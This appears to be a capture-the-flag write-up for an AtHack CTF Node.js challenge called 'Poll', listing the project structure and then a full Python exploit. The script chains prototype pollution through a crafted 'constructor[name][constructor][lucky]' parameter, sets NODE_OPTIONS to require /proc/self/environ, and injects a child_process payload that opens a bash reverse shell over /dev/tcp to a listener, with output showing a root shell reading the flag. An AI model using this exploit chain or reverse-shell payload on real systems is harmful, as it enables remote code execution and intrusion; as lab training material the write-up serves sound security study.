Diefunction
Search…
POLL

Project

Structure

poll/
├── docker
│   └── node
│   └── Dockerfile
├── docker-compose.yml
└── src
├── app.js
├── config.js
├── flag.txt
├── package.json
├── package-lock.json
├── static
│   ├── bootstrap
│   │   └── css
│   │   └── bootstrap.min.css
│   ├── css
│   │   └── Lightbox-Gallery.css
│   ├── img
│   │   ├── about-bg.jpg
│   │   ├── admin-bg.jpg
│   │   ├── contact-bg.jpg
│   │   ├── Fword-CTF-bakground.png
│   │   ├── home-bg.jpg
│   │   ├── index-bg.jpg
│   │   ├── login-bg.png
│   │   ├── naruto.png
│   │   ├── register-bg.jpg
│   │   ├── Wallpaper Subaru Natsuki, Zero, 4K, 5K, Art 6507310401.jpg
│   │   ├── wp2349778-kuroko-tetsuya-wallpapers.jpg
│   │   └── wp3754599-hinata-shy-wallpapers.jpg
│   └── js
│   └── clean-blog.js
└── views
├── admin.ejs
├── animes.ejs
├── home.ejs
├── index.ejs
├── login.ejs
├── register.ejs
└── update.ejs

Solution

Install pip
sudo apt install python3-pip
Install requests
python3 -m pip install requests
Start Netcat listener
nc -lnvp 8443
Exploit
from requests import Session
host = '127.0.0.1'
port = '1234'
session = Session()
session.proxies = {'http': '127.0.0.1:8080'}
payload = {
'username':'diefunction',
'password': 'diefunction',
'anime': 'Bleach'
}
session.post(f'http://{host}:{port}/register', json = payload)
payload = {
'username':'diefunction',
'password': 'diefunction'
}
session.post(f'http://{host}:{port}/login', json = payload)
payload = {
'constructor[name][constructor][lucky]': '1',
'luck': '1'
}
session.get(f'http://{host}:{port}/update', params = payload)
payload = {
'envname': 'NODE_OPTIONS',
'env': '--require /proc/self/environ',
'path': '/data/config.js'
}
session.post(f'http://{host}:{port}/admin', json = payload)
code = "'';require('child_process').execSync('/bin/bash -c \\\'/bin/bash -i >& /dev/tcp/172.17.0.1/8443 0>&1\\\'');//"
payload = {
'envname': 'NODE_VERSION',
'env': f'{code}',
'path': '/data/package.json'
}
session.post(f'http://{host}:{port}/admin', json = payload)
Run the script
python3 exploit.py
Output
[email protected]:~/Desktop/athack-ctf/poll$ nc -lnvp 8443
Listening on 0.0.0.0 8443
Connection received on 172.18.0.3 46818
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
[email protected]:/data# cat /flag.txt
cat /flag.txt
AtHackCTF{Dummy_Flag}
Copy link